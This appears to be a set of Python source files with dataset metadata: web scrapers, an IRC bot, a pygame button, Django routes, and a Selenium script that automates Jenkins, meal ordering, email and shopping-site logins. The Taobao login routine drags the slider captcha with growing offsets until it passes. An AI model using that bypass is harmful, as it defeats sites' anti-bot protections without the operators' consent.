obj_hi.attrs['azimuth'] = az_array\n obj_low.attrs['elevation'] = el_array\n obj_hi.attrs['elevation'] = el_array\n\n if transpose:\n obj_low = obj_low.transpose()\n obj_hi = obj_hi.transpose()\n\n return obj_low, obj_hi\n","sub_path":"act/io/noaapsl.py","file_name":"noaapsl.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"315329359","text":"# -*- coding: utf-8 -*-\n\n\nimport scrapy\nfrom ..items import CarItem\nfrom scrapy_splash import SplashRequest\nimport re\nimport time\nfrom .. 
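# A minimal sketch (not from the original reader) of the xarray pattern above:
# build one pandas DataFrame per table, swap the row index for a 'height'
# coordinate, and concatenate the per-timestep datasets along 'time'. The
# column names and values here are synthetic.
import datetime as dt
import numpy as np
import pandas as pd
import xarray as xr

datasets = []
for hour in (0, 1):
    df = pd.DataFrame({'HT': [100.0, 200.0], 'SPD': [1.5, 2.5]})
    ds = df.to_xarray().swap_dims({'index': 'height'}).reset_coords('index')
    ds = ds.assign_coords({'time': np.array(dt.datetime(2021, 1, 1, hour)),
                           'height': ds['HT'].values})
    datasets.append(ds)

combined = xr.concat(datasets, 'time')  # dims become (time: 2, height: 2)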
import autohome\nimport demjson\n\nscript = \"\"\"\nfunction main(splash)\n splash.images_enabled = false\n splash:go(\"https://www.autohome.com.cn\")\n splash:wait(5)\nend\n\"\"\"\n\n\nclass CarSpider(scrapy.Spider):\n name = \"car\"\n allowed_domains = [\"autohome.com.cn\"]\n url = 'https://www.autohome.com.cn/grade/carhtml/'\n\n def start_requests(self):\n letters = [chr(x) for x in range(ord('A'), ord('Z') + 1)]\n for lett in letters:\n yield scrapy.Request(url=self.url+lett+'.html', callback=self.parse, meta={'splash': {\n 'args': {'lua_source': script},\n 'endpoint': 'render.html'\n }\n })\n\n def parse(self, response):\n for sel in response.xpath('body'):\n item = CarItem()\n Lists = sel.xpath('dl')\n for list in Lists:\n item['brand_name'] = list.xpath('dt/div/a/text()')[0].extract()\n cars = list.xpath('dd/ul[@class=\"rank-list-ul\"]/li[contains(@id,\"s\")]/h4/a/text()').extract()\n i = 0\n for car in cars:\n item['cars'] = car\n item['link'] = list.xpath('dd/ul[@class=\"rank-list-ul\"]/li[contains(@id,\"s\")]/h4/a/@href')[i].extract()\n item['series_id'] = int(re.compile(r'\\/\\/.*\\/(.*)\\/.*').findall(item['link'])[0])\n url = response.urljoin(item['link'])\n i += 1\n\n yield scrapy.Request(url, meta={'brand_name': item['brand_name'], 'sid': item['series_id']}, callback=self.parse_article)\n\n def parse_article(self, response):\n detail = response.xpath('//div[@class=\"carseries-main\"]/div[@class=\"series-list\"]')\n item = CarItem()\n brand_name = response.meta['brand_name']\n sid = response.meta['sid']\n if len(detail) > 0:\n names = detail.xpath('div[@class=\"series-content\"]/div[@id=\"specWrap-2\"]/dl/dd/div[@class=\"spec-name\"]/div[@class=\"name-param\"]')\n for name in names:\n name = name.xpath('p')[0]\n item['carId'] = name.xpath('@data-gcjid').extract()\n item['carName'] = name.xpath('a/text()').extract()\n item['link'] = name.xpath('a/@href')[0].extract()\n url = response.urljoin(item['link'])\n if isinstance(item['carId'], str):\n item['carId'] = int(item['carId'])\n else:\n item['carId'] = int(item['carId'][0])\n\n yield scrapy.Request(url, meta={'carId': item['carId'], 'brand_name': brand_name, 'sid': sid}, callback=self.parse_article_detail)\n\n else:\n detail = response.xpath('//div[@class=\"title\"]/div[@class=\"title-content\"]')\n names = detail.xpath('div')\n for name in names:\n name = name.xpath('div[@class=\"models\"]/div[@class=\"modelswrap\"]/div/div/table/./tr/td[@class=\"name_d\"]/div/a')\n for n in name:\n item['carName'] = n.xpath('text()').extract()\n item['link'] = n.xpath('@href')[0].extract()\n item['carId'] = item['link'][5:-1]\n url = response.urljoin(item['link'])\n if isinstance(item['carId'], str):\n item['carId'] = int(item['carId'])\n else:\n item['carId'] = int(item['carId'][0])\n\n yield scrapy.Request(url, meta={'carId': item['carId'], 'brand_name': brand_name, 'sid': sid}, callback=self.parse_article_detail)\n\n def parse_article_detail(self, response):\n detail = response.xpath('//div[@class=\"container\"]')\n item = CarItem()\n brand_name = response.meta['brand_name']\n sid = response.meta['sid']\n item['carId'] = response.meta['carId']\n item['market_price_str'] = detail.xpath('div[@class=\"carspec-wrapper\"]/div[@class=\"carspec-main\"]/div[@class=\"spec-information\"]/div[@class=\"information-con\"]/div[@class=\"information-summary\"]/dl[@class=\"information-price\"]/dd[3]/span[@class=\"factoryprice\"]/text()')[0].extract()\n if item['market_price_str'] == \"暂无\":\n item['market_price_str'] = \"暂无\"\n else:\n 
item['market_price_str'] = item['market_price_str'].split(\":\")\n item['market_price_str'] = item['market_price_str'][1] + \"万元\"\n item['carBrand'] = detail.xpath('div[@class=\"container athm-sub-nav article-sub-nav\"]/div[@class=\"athm-sub-nav__car\"]/div[@class=\"athm-sub-nav__car__name\"]/a/text()')[0].extract()\n item['carBrand'] = item['carBrand'][:len(item['carBrand'])-1]\n item['cars'] = detail.xpath('div[@class=\"container athm-sub-nav article-sub-nav\"]/div[@class=\"athm-sub-nav__car\"]/div[@class=\"athm-sub-nav__car__name\"]/a/h1/text()')[0].extract()\n item['carName'] = detail.xpath('div[@class=\"carspec-wrapper\"]/div[@class=\"carspec-main\"]/div[@class=\"spec-information\"]/div[@class=\"information-tit\"]/h2/text()')[0].extract()\n baseInfo = detail.xpath('div[@class=\"carspec-wrapper\"]/div[@class=\"carspec-main\"]/div[@class=\"spec-information\"]/div[@class=\"information-con\"]/div[@class=\"information-summary\"]/div[@class=\"spec-baseinfo\"]/ul[@class=\"baseinfo-list\"]/li')\n item['link'] = baseInfo[8].xpath('a/@href')[0].extract()\n url = response.urljoin(item['link'])\n\n yield SplashRequest(url, meta={'carId': item['carId'], 'manufacturer': item['carBrand'],\n 'cars': item[\"cars\"], 'carName': item['carName'],\n 'price': item['market_price_str'], 'brand_name': brand_name,\n 'sid': sid},\n callback=self.parse_article_config, args={'wait': 5})\n\n def parse_article_config(self, response):\n html = response.body\n html = str(html.decode('utf-8'))\n item = CarItem()\n\n infos = autohome.fetchCarInfo(html)\n i = 0\n for info in infos:\n item['type_id'] = int(info)\n detail = infos[item['type_id']]\n for key in detail:\n item[\"%s\" % key] = detail[key]\n\n if item['car_name'] == \"-\":\n i += 1\n continue\n item['brand_name'] = response.meta['brand_name']\n item['manufacturer'] = response.meta[\"manufacturer\"]\n item['series_name'] = response.meta[\"cars\"]\n item['series_id'] = response.meta['sid']\n prices = response.xpath('//*[@id=\"tr_2000\"]/td')\n p = []\n for price in prices:\n try:\n price = price.xpath('div/text()').extract()\n p.append(price)\n except:\n pass\n if len(p) == 0:\n break\n else:\n if len(p[i]) > 1:\n p[i] = p[i][0] + p[i][1]\n else:\n p[i] = p[i][0]\n item['market_price_str'] = p[i] + '万元'\n item['manufacturer'] = response.meta['manufacturer']\n names = item['car_name'].split(\" \")\n series = item['series_name'].split(\" \")\n if names[:len(series)] == series[:len(series)]:\n pass\n else:\n item['car_name'] = \" \".join(series[:len(series) + 1]) + \" \" + \" \".join(names[len(series):])\n yield item\n i += 1\n pass\n # type_id = response.meta['carId']\n # item['type_id'] = type_id\n # detail = infos[type_id]\n # for key in detail:\n # item[\"%s\" % key] = detail[key]\n # if item['car_name'] == \"-\":\n # pass\n # else:\n # item['brand_name'] = response.meta['brand_name']\n # item['manufacturer'] = response.meta[\"manufacturer\"]\n # item['series_name'] = response.meta[\"cars\"]\n # price = response.xpath('//*[@id=\"tr_2000\"]/td')\n # try:\n # price = price.xpath('div/text()')[0].extract()\n # except:\n # pass\n # item['market_price_str'] = price + '万元'\n # item['manufacturer'] = response.meta['manufacturer']\n # names = item['car_name'].split(\" \")\n # series = item['series_name'].split(\" \")\n # if names[:len(series)] == series[:len(series)]:\n # pass\n # else:\n # item['car_name'] = \" \".join(series[:len(series)+1]) + \" \" + \" \".join(names[len(series):])\n # yield 
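# A standalone sketch (not from the original spider) of the series-name fixup in
# parse_article_config above: when car_name does not already start with the
# series tokens, the first len(series) tokens are replaced by the series name.
# The sample strings are made up.
def normalize_car_name(car_name, series_name):
    names = car_name.split(" ")
    series = series_name.split(" ")
    if names[:len(series)] == series:
        return car_name  # already prefixed with the series name
    # Mirrors the source: drop the first len(series) tokens and prepend the series.
    return " ".join(series) + " " + " ".join(names[len(series):])

assert normalize_car_name("Coupe 2019 1.5T", "H6 Coupe") == "H6 Coupe 1.5T"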
item\n\n\n\n","sub_path":"car/car/spiders/car_spider.py","file_name":"car_spider.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433237544","text":"import time\nfrom functools import partial\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nfrom Server import *\nfrom DataRestaurantsParser import *\nfrom multiprocessing.dummy import Pool as ThreadPool\nfrom selenium import webdriver\nfrom datetime import datetime\nfrom multiprocessing import Pool\n\n\n\n\n\nclass PhotoRestParsed:\n\n def get_unparsed_restaurants_url(self, restaurants):\n list = []\n\n for rest in restaurants:\n photo_parsed = rest[4]\n if photo_parsed == 0:\n list.append(rest)\n return list\n\n\n def find_photos_in_hero_list(self, driver):\n button_sel = 'tinyThumb '\n urls = []\n try:\n is_exist = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.CLASS_NAME, button_sel)))\n button = driver.find_elements_by_class_name(button_sel)\n server_response_in_html = bs(driver.page_source, 'html.parser')\n photos = server_response_in_html.find_all('div', attrs={'class': 'tinyThumb'})\n for photo in enumerate(photos):\n if photo[0] == 10:\n break\n else:\n url = photo[1]\n urls.append(url['data-bigurl'])\n return urls\n except:\n pass\n\n def get_rest_foto(self, driver, url, id_rest):\n new_url = url + '#photos;aggregationId=&albumid=101&filter=7'\n driver.get(new_url)\n time.sleep(2)\n photo_urls = []\n parsed = 0\n parsed_photo_none = 2\n button_sel = 'photoGridBox'\n try:\n is_exist = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.CLASS_NAME, button_sel)))\n button = driver.find_elements_by_class_name(button_sel)\n server_response_in_html = bs(driver.page_source, 'html.parser')\n photos = server_response_in_html.find_all('div', attrs={'class': 'albumGridItem'})\n if len(photos) == 0:\n photos = self.find_photos_in_hero_list(driver)\n for photo in enumerate(photos):\n photo_url = photo[1]\n photo_urls.append({'restaurantID': id_rest,\n 'photo_url': photo_url,\n 'parsed': parsed})\n else:\n for photo in enumerate(photos):\n if photo[0] == 9:\n break\n else:\n url = photo[1].find('img')\n photo_url = url['src']\n photo_urls.append({'restaurantID': id_rest,\n 'photo_url': photo_url,\n 'parsed': parsed})\n return photo_urls\n\n except:\n # pass\n photo_urls.append({'restaurantID': id_rest,\n 'parsed': parsed_photo_none})\n return photo_urls\n\n\n\n\n\n def start_photo_parse(self, driver, restaurant):\n\n # for rest_urls in tqdm.tqdm(restaurantsList):\n url = restaurant[1]\n id_rest = restaurant[0]\n foto_url = self.get_rest_foto(driver, url, id_rest)\n\n return foto_url\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PhotoRestParser.py","file_name":"PhotoRestParser.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338900382","text":"# -*- coding: utf-8 -*-\nfrom irc3.plugins.command import command\nfrom irc3.plugins.cron import cron\nfrom irc3.plugins.social import Social\nfrom irc3.plugins.social import TwitterAdapter\nfrom irc3.compat import asyncio\nfrom datetime import datetime\nfrom functools import partial\nfrom chut import sh\nimport feedparser\nimport requests\nimport logging\nimport random\nimport irc3\nimport 
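# A condensed sketch (not from the original class) of the two-step scrape used in
# PhotoRestParser above: wait for a CSS class with WebDriverWait, then re-parse
# driver.page_source with BeautifulSoup and read 'data-bigurl' attributes. It
# assumes a live `driver` and that every matched div carries that attribute.
from bs4 import BeautifulSoup
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

def first_thumb_urls(driver, limit=10):
    WebDriverWait(driver, 3).until(
        EC.presence_of_element_located((By.CLASS_NAME, 'tinyThumb')))
    soup = BeautifulSoup(driver.page_source, 'html.parser')
    thumbs = soup.find_all('div', attrs={'class': 'tinyThumb'})
    # Cap the result, mirroring the enumerate/break at 10 in the source.
    return [t['data-bigurl'] for t in thumbs[:limit]]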
re\n\n\n@irc3.plugin\nclass Alain(object):\n\n def __init__(self, bot):\n bot.config['channel'] = irc3.utils.as_channel(bot.config.channel)\n self.bot = bot\n self.session = requests.Session()\n self.plone = requests.Session()\n try:\n self.plone.auth = tuple(self.bot.config.alain['plone'].split(':'))\n except:\n pass\n\n @irc3.event(irc3.rfc.JOIN)\n def matin(self, mask=None, **kw):\n if mask.nick.startswith(self.bot.nick):\n self.bot.privmsg(self.bot.config.channel, 'matin')\n\n @irc3.event(':(?P\\S+) PRIVMSG {channel} :(lol|mdr)$')\n def lol(self, mask=None, channel=None, data=None):\n message = random.choice(('MDR', 'hihihi', 'HAHAHA', \"mdr t'es con\"))\n self.bot.privmsg(self.bot.config.channel, message)\n\n @irc3.event(':(?P\\S+) PRIVMSG {channel} :'\n '.*\\s(faudrai.|faut|ca serait bien que)\\s+qu.*')\n def yakafokon(self, mask=None, channel=None, data=None):\n message = 'WARNING !!! YAKAFOKON DETECTED !!!!'\n self.bot.privmsg(self.bot.config.channel, message)\n\n @irc3.event(\n ':(?i)(?P\\S+) PRIVMSG {channel} :.*\\sapprendre.*python.*')\n def tutorial(self, mask=None, channel=None, data=None):\n message = (\n '''Pour apprendre python vous pouvez commencer par ici: '''\n 'http://www.afpy.org/doc/python/3.5/tutorial/index.html'\n )\n self.bot.privmsg(self.bot.config.channel, message)\n\n @irc3.event(':(?P\\S+) PRIVMSG {channel} :.*\\soffre.*emploi.*')\n def job(self, mask=None, channel=None, data=None):\n message = (\n '''Pour poster une offre d'emploi veuillez consulter:'''\n ' http://www.afpy.org/doc/afpy/faq.html'\n '#comment-puis-je-poster-une-offre-d-emploi')\n self.bot.privmsg(self.bot.config.channel, message)\n\n @cron('10 9,11,14,17,20 * * *')\n def awaiting_review(self):\n url = 'http://www.afpy.org/search_rss?review_state=pending'\n feed = feedparser.parse(self.plone.get(url).text)\n entries = [str(e.id) for e in feed.entries]\n entries = [e for e in entries if '/forums/' not in e]\n if entries:\n msg = u'Hey! Il y a des trucs à modérer: %s' % ' - '.join(entries)\n self.bot.log.info('%r', msg)\n self.bot.privmsg(self.bot.config.channel, msg)\n\n def incoming_afpyros(self):\n feed = feedparser.parse(self.session.get(\n 'http://afpyro.afpy.org/afpyro.rss').text)\n now = datetime.now()\n now = datetime(now.year, now.month, now.day)\n for e in feed.entries:\n t = e.updated_parsed\n d = datetime(t.tm_year, t.tm_mon, t.tm_mday)\n if d >= now:\n yield d, e.link\n\n @cron('30 17 * * *')\n def afpyro_cron(self, force=False):\n messages = []\n now = datetime.now()\n now = datetime(now.year, now.month, now.day)\n for date, link in self.incoming_afpyros():\n delta = date - now\n message = ''\n if delta.days == 0:\n message = 'Ca va commencer!!! %s' % link\n elif delta.days == 1:\n message = 'C\\'est demain!!! %s' % link\n elif delta.days > 10 and (delta.days % 5 == 0 or force):\n message = 'Prochain afpyro dans %s jours...... *loin* %s' % (\n delta.days, link)\n elif delta.days > 5 and (delta.days % 3 == 0 or force):\n message = 'Prochain afpyro dans %s jours... %s' % (\n delta.days, link)\n elif delta.days > 0 and delta.days < 5:\n message = 'Prochain afpyro dans %s jours! 
%s' % (\n delta.days, link)\n if message:\n messages.append(message)\n if force:\n return messages\n for msg in messages:\n self.bot.privmsg(self.bot.config.channel, msg)\n\n @command(permission='view')\n def afpyro(self, *args, **kwargs):\n \"\"\"Show incoming afpyro\n\n %%afpyro\n \"\"\"\n for msg in self.afpyro_cron(force=True):\n yield msg\n\n\n@irc3.plugin\nclass AfpySocial(Social):\n\n default_network = 'twitter'\n networks = dict(\n alain=dict(\n adapter=TwitterAdapter,\n factory='twitter.Twitter',\n auth_factory='twitter.OAuth',\n domain='api.twitter.com',\n api_version='1.1',\n secure=True\n ),\n pycon=dict(\n adapter=TwitterAdapter,\n factory='twitter.Twitter',\n auth_factory='twitter.OAuth',\n domain='api.twitter.com',\n api_version='1.1',\n secure=True\n ),\n )\n\n @command(permission='edit')\n def tweet(self, mask, target, args):\n \"\"\"Post to twitter\n\n %%tweet [pycon] ...\n \"\"\"\n # %%tweet (alain|pycon) ...\n if args['pycon']:\n args['--id'] = 'pycon'\n else:\n args['--id'] = 'alain'\n super(AfpySocial, self).tweet(mask, target, args)\n\n def send_alain_tweet(self, message):\n for name, status in self.send_tweet(message, id='alain'):\n self.bot.log.info('[tweet] %s: %s', name, status)\n\n\n# feeds\n\n_afpy_dates = [\n re.compile(r'(\\d{4})/(\\d{2})/(\\d{2}) (\\d{,2}):(\\d{2}):(\\d{2})'),\n re.compile(r'(\\d{4})-(\\d{2})-(\\d{2}) (\\d{,2}):(\\d{2}):(\\d{2})'),\n]\n\n\ndef afpy_date(dt):\n \"\"\"parse a UTC date in MM/DD/YYYY HH:MM:SS format\"\"\"\n g = None\n for afpy_date in _afpy_dates:\n try:\n g = afpy_date.search(dt).groups()\n except:\n pass\n if g:\n return tuple([int(i) for i in g] + [0, 0, 0])\nfeedparser.registerDateHandler(afpy_date)\n\n\ndef feed_dispatcher(bot):\n send_tweet = bot.get_plugin(AfpySocial).send_alain_tweet\n call_later = bot.loop.call_later\n\n def dispatcher(messages):\n for i, (c, m) in enumerate(messages):\n if u'afpy' in m.lower():\n bot.log.info('Sending %r', m)\n # call_later(i + 1, bot.privmsg, c, m)\n call_later(i + 1, send_tweet, m)\n return dispatcher\n","sub_path":"alain/alain3.py","file_name":"alain3.py","file_ext":"py","file_size_in_byte":6565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566889895","text":"import pygame.font\nclass Button():\n def __init__(self,ai_settings,screen,msg):\n #initialize button attributes\n self.screen = screen\n self.screen_rect = screen.get_rect()\n \n #set dimensions and properties of the Button\n self.width = 200\n self.height = 50\n self.button_color = (0,255,0)\n self.text_color = (255,255,255)\n self.font = pygame.font.SysFont(None,48) #none means use default font\n \n #build button's rect object and center it\n self.rect = pygame.Rect(0,0,self.width,self.height)\n self.rect.center = self.screen_rect.center\n\n #button message needs to prep only once\n self.prep_msg(msg)\n\n def prep_msg(self,msg):\n #turns msg into image and center text on button\n self.msg_image = self.font.render(msg,True,self.text_color,self.button_color)\n self.msg_image_rect = self.msg_image.get_rect()\n self.msg_image_rect.center = self.rect.center\n\n def draw_button(self):\n self.screen.fill(self.button_color,self.rect) #draws rectangular portion of button\n self.screen.blit(self.msg_image,self.msg_image_rect) #draws text image to the screen\n ","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"601959897","text":"from 
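# The parsing core of the afpy_date handler above, isolated so it can run
# without feedparser (a sketch, not the plugin itself): match either date
# format and return the 9-field time tuple feedparser expects.
import re

_patterns = [
    re.compile(r'(\d{4})/(\d{2})/(\d{2}) (\d{1,2}):(\d{2}):(\d{2})'),
    re.compile(r'(\d{4})-(\d{2})-(\d{2}) (\d{1,2}):(\d{2}):(\d{2})'),
]

def parse_feed_date(dt):
    for pattern in _patterns:
        match = pattern.search(dt)
        if match:
            # struct_time-like 9-tuple; weekday/yearday/dst are zeroed.
            return tuple(int(i) for i in match.groups()) + (0, 0, 0)
    return None  # unrecognized format: let feedparser try its own handlers

assert parse_feed_date('2015-06-01 18:30:00')[:6] == (2015, 6, 1, 18, 30, 0)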
django.urls import path\n\nfrom crop.views import CropAPIView, CropDetailAPIView\n\n\napp_name = 'crop'\n\nurlpatterns = [\n path('crops/', CropAPIView.as_view(), name='crop-list'),\n path('crops//', CropDetailAPIView.as_view(), name='crop-detail')\n]","sub_path":"crop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539753630","text":"import sys\r\nimport os\r\nimport shutil\r\nimport time\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport urllib.request\r\nimport json\r\nimport cv2\r\nimport numpy as np\r\nimport _thread\r\nimport schedule\r\n\r\nTRIGGER_USER = \"Zhou Hehe\"\r\nFLAT_EXIT = False\r\n\r\ndef get_time(): # 20190620-06:30\r\n\treturn datetime.now().strftime('%Y%m%d-%H:%M')\r\n\r\ndef click_locxy(dr, x, y, left_click=True):\r\n\tif left_click:\r\n\t\tActionChains(dr).move_by_offset(x, y).click().perform()\r\n\telse:\r\n\t\tActionChains(dr).move_by_offset(x, y).context_click().perform()\r\n\ttime.sleep(2)\r\n\tActionChains(dr).move_by_offset(-x, -y).perform()\r\n\r\nclass Initial_Firefox():\r\n\tdef __init__(self,firefoxConfig):\r\n\t\tself.firefoxPath = firefoxConfig[\"firefox_path\"]\r\n\t\tself.driver = webdriver.Firefox(self.firefoxPath)\r\n\tdef get_driver(self):\r\n\t\treturn self.driver\r\n\t\t\r\n\r\n\t\r\nclass Trigger_jenkins():\r\n\tdef __init__(self,driver,jenkinsConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = jenkinsConfig['Jekins_addr'] # r'http://build.asrmicro.com/view/Android9.0/job/adroid9.0_ci/'\r\n\t\tself.username = jenkinsConfig['Jekins_username']\r\n\t\tself.password = jenkinsConfig['Jekins_passwd']\r\n\t\r\n\tdef trigger_adroid9_ci(self,idList,projectName):\r\n\t\tdriver = self.driver\r\n\t\tgerritid_list=idList\r\n\t\tdriver.get(self.addr)\r\n\t\tprint(driver.title)\r\n\t\t\r\n\t\tdriver.find_element_by_class_name(\"login\").click() #点击右上角login\r\n\t\tdriver.find_element_by_name('j_username').send_keys(self.username)\r\n\t\tdriver.find_element_by_name(\"j_password\").send_keys(self.password)\r\n\t\tdriver.find_element_by_id('yui-gen1-button').click() #点击登录\r\n\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/view/Android9.0/job/adroid9.0_ci/build?delay=0sec']\").click() #点击 Build with Parameters\r\n\t\tgerritid=driver.find_element_by_class_name('setting-input').send_keys(gerritid_list) #输入GERRIT_IDS\r\n\r\n\t\tif projectName == \"aquilac_phone-userdebug\":\r\n\t\t\tprint('Nothing to do')\r\n\t\telif projectName == \"aquilac_phonegms-userdebug\":\r\n\t\t\tdriver.find_element_by_name(\"parameter\").find_element_by_xpath(\"//*[@value='adroid9.0/aquilac_phone-userdebug']\").click() #取消默认的aquilac_phone-userdebug\r\n\t\t\tdriver.find_element_by_name(\"parameter\").find_element_by_xpath(\"//*[@value='adroid9.0/aquilac_phonegms-userdebug']\").click() #选中aquilac_phonegms-userdebug\r\n\t\telse:\r\n\t\t\tprint('Nothing to do')\r\n\t\t\r\n\t\tjs3 = \"window.scrollTo(0,600)\" # 滑动600像素\r\n\t\tdriver.execute_script(js3);time.sleep(2)\r\n\t\t\r\n\t\t\r\n\t\tcheckboxs = driver.find_elements_by_xpath(\".//*[@type='checkbox']\") # 勾上OTA、clean_all复选框\r\n\t\tfor i in checkboxs:\r\n\t\t\ti.click()\r\n\t\tdriver.find_element_by_id('yui-gen1-button').click() #点击build按钮\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//input[@placeholder='find']\").send_keys(TRIGGER_USER + 
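# A commented reproduction (not a new API) of the click_locxy helper above: click
# at an offset from the current mouse position, then move back so repeated calls
# stay anchored to the same origin. Assumes a live `driver`.
import time
from selenium.webdriver.common.action_chains import ActionChains

def click_at_offset(driver, x, y, left_click=True):
    chain = ActionChains(driver).move_by_offset(x, y)
    # Left click or context (right) click at the offset position.
    (chain.click() if left_click else chain.context_click()).perform()
    time.sleep(2)
    # Undo the move so the next relative offset starts from the same point.
    ActionChains(driver).move_by_offset(-x, -y).perform()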
Keys.ENTER);time.sleep(1)#搜索ZhouHehe触发的jenkins的ID\r\n\t\tbuildID = driver.find_elements_by_xpath(\"//*[@update-parent-class='.build-row']\")[0]\r\n\t\tbuildNum = buildID.text.split('#')[1].strip() # buildID.text是提取出来的build NO,如 : #3335\r\n\t\tprint(buildNum) \r\n\t\tbuildID.click()\r\n\t\tprint(url + buildNum)\r\n\t\t#webcontext = urllib.request.urlopen(url + buildNum).read()\r\n\t\t#print(webcontext)\r\n\t\t\r\n\t\tdriver.quit()\r\n\t\treturn url + buildNum\r\n\r\nclass Order_Dinner():\r\n\tdef __init__(self,driver,DinnerConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = DinnerConfig['dinner_addr'] # r\"http://10.1.50.42:8888/\"\r\n\t\r\n\tdef order_a_dinner(self,username,password):\r\n\t\tdriver = self.driver\r\n\t\tdriver.get(self.addr)\r\n\t\t#print(driver.title)\r\n\t\tprint(\"===============================\")\r\n\t\tprint((\"订餐系统欢迎您 (%s)\") % (username))\r\n\t\tprint(\"===============================\")\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/auth/login']\").click();time.sleep(0.2)\r\n\t\tdriver.find_element_by_name('email').send_keys(username)\r\n\t\tdriver.find_element_by_name(\"password\").send_keys(password)\r\n\t\tdriver.find_element_by_name(\"submit\").click();time.sleep(0.2)\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/auth/ordering_D']\").click()\r\n\t\tprint(\"%s---已为账户%s订餐\" % (get_time(),username))\r\n\t\t\r\n\t\tcookies = driver.get_cookies()\r\n\t\tprint(cookies)\r\n\t\r\n\tdef exit_account(self):\r\n\t\tdriver = self.driver\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/auth/logout']\").click()\r\n\t\t\r\n\r\nclass Send_Mail():\r\n\tdef __init__(self,driver,mailConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = mailConfig['mail_addr'] # r'https://mail.asrmicro.com'\r\n\t\tself.username = mailConfig['Mail_username']\r\n\t\tself.password = mailConfig['Mail_passwd']\r\n\r\n\tdef send_a_mail(self,receiver_list,copy_list,title_text,context_text):\r\n\t\tdriver = self.driver \r\n\t\tdriver.get(self.addr)\r\n\t\tprint(driver.title);time.sleep(2) #这里必须加\r\n\t\tdriver.find_element_by_name('username').send_keys(self.username)\r\n\t\tdriver.find_element_by_name(\"password\").send_keys(self.password)\r\n\t\tdriver.find_element_by_class_name('signinbutton').click();time.sleep(2) #点击登录\r\n\t\t \r\n\t\tdriver.find_element_by_xpath(\".//*[@id='_ariaId_35']\").click() #点击新建邮件\r\n\t\tdriver.find_element_by_xpath(\"//*[@aria-label='发送收件人。请输入您的联系人列表中的电子邮件地址或姓名。']\").send_keys(receiver_list)#收件人\r\n\t\tdriver.find_element_by_xpath(\"//*[@aria-label='抄送收件人。请输入您的联系人列表中的电子邮件地址或姓名。']\").send_keys(copy_list) #抄送\r\n\t\tdriver.find_element_by_class_name('_f_ql._f_rl.textbox.allowTextSelection.placeholderText').send_keys(title_text) #邮件主题\r\n\t \r\n\t\tclick_locxy(driver,650,490,True);time.sleep(2) #这里sleep必须加\r\n\t\tdriver.switch_to.active_element.send_keys(context_text);time.sleep(2) #邮件正文\r\n\t\tdriver.find_element_by_xpath(\"//*[@aria-label='发送']\").click()\r\n\t\tdriver.quit()\r\n\r\nclass TaoBao():\r\n\tdef __init__(self,driver,TBConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = TBConfig['tb_addr'] # r'https://www.taobao.com/'\r\n\r\n\tdef taobao_verify(driver,index_y):\r\n\t\t# 获取滑块\r\n\t\telement = driver.find_element_by_xpath(\"//span[@id='nc_1_n1z']\")\r\n\t\tActionChains(driver).click_and_hold(on_element=element).perform()\r\n\t\tActionChains(driver).move_to_element_with_offset(to_element=element, xoffset=index_y, yoffset=0).perform()\r\n\t\tActionChains(driver).release(on_element=element).perform()\r\n\t\ttime.sleep(3)\r\n\r\n\tdef 
taobao(self, username, secret):\r\n\t\tdriver = self.driver\r\n\t\tdriver.get(self.addr)\r\n\t\tprint(driver.title)\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//a[contains(text(),'亲,请登录')]\").click()\r\n\t\tdriver.find_element_by_xpath(\"//i[@id='J_Quick2Static']\").click()\r\n\t\ttime.sleep(0.5)\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='TPL_username_1']\").send_keys(username)\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='TPL_password_1']\").send_keys(secret)\r\n\t\ttime.sleep(0.2)\r\n\t\tindex_y = 200\r\n\t\t# Sweep the slider further right on every retry until the check passes\r\n\t\twhile True:\r\n\t\t\t#time.sleep(2)\r\n\t\t\ttry:\r\n\t\t\t\tself.taobao_verify(driver, index_y)\r\n\t\t\t\tindex_y += 50\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"try----\")\r\n\t\t\t\tbreak\r\n\t\ttime.sleep(2)\r\n\t\tdriver.find_element_by_xpath(\"//button[@id='J_SubmitStatic']\").click()\r\n\t\t\r\n\t\t#driver.find_element_by_xpath(\"//a[contains(text(),'我的京东')]\").click()\r\n\t\t# driver.quit()\r\n\r\nclass JingDong():\r\n\tdef __init__(self, driver, JDConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = JDConfig['jd_addr'] # 